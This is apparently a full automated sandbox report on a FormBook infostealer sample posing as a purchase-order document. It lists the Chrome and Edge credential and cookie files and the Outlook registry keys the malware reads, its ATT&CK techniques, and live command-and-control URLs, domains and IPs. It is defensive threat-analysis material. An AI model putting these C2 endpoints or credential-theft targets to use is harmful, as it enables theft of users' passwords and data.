Code function: 0_2_001B8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_001B8195

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_0019D27A GetUserNameW,

0_2_0019D27A

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_0017B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0017B952

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001442DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PO-DOC1522025-12.exe	Binary or memory string: WIN_81
Source: PO-DOC1522025-12.exe	Binary or memory string: WIN_XP
Source: PO-DOC1522025-12.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: PO-DOC1522025-12.exe	Binary or memory string: WIN_XPe
Source: PO-DOC1522025-12.exe	Binary or memory string: WIN_VISTA
Source: PO-DOC1522025-12.exe	Binary or memory string: WIN_7
Source: PO-DOC1522025-12.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_001C1204
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_001C1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-DOC1522025-12.exe	31%	Virustotal		Browse
PO-DOC1522025-12.exe	42%	ReversingLabs	Win32.Trojan.Generic
PO-DOC1522025-12.exe	100%	Avira	DR/AutoIt.Gen8
PO-DOC1522025-12.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.rssnewscast.com/fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV	100%	Avira URL Cloud	malware
http://www.elettrosistemista.zip/fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV	100%	Avira URL Cloud	malware
https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR	0%	Avira URL Cloud	safe
http://www.empowermedeco.com	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV	100%	Avira URL Cloud	malware
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	false	high
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	false	high
www.techchains.info	66.29.149.46	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.shenzhoucui.com	unknown	unknown	true	unknown
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.empowermedeco.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV	true	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV	true	Avira URL Cloud: malware	unknown
http://www.magmadokum.com/fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV	true	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.magmadokum.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/	false		high
http://www.elettrosistemista.zip/fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV	true	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV	true	Avira URL Cloud: safe	unknown
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4623753235.0000000004C3D000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.4623285061.0000000003E5E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4625520425.0000000005D00000.00000004.00000800.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR	netbtugc.exe, 00000004.00000002.4623285061.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003CBA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591632
Start date and time:	2025-01-15 08:27:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-DOC1522025-12.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@16/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 45 Number of non-executed functions: 303
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:28:53	API Interceptor	12804110x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	Payment Notification Confirmation 010_01_2025.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.3xfootball.com	Payment Notification Confirmation 010_01_2025.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	https://mywhats.chat/	Get hash	malicious	Unknown	Browse	156.251.25.108
	Payment Notification Confirmation 010_01_2025.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	https://afwkqc.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	https://wap.sunblock-pro.com/	Get hash	malicious	Unknown	Browse	154.193.113.232
	i686.elf	Get hash	malicious	Mirai	Browse	156.244.6.20
	https://www.xietaoz.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://wap.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://m.activeselfie.com/	Get hash	malicious	Unknown	Browse	154.193.113.232
	http://m.ccsurj.org/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://www.activeselfie.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
REGISTER-ASIT	Payment Notification Confirmation 010_01_2025.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW	Payment Notification Confirmation 010_01_2025.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
SEDO-ASDE	Payment Notification Confirmation 010_01_2025.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	http://thehalobun.com/	Get hash	malicious	HTMLPhisher	Browse	91.195.240.19
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................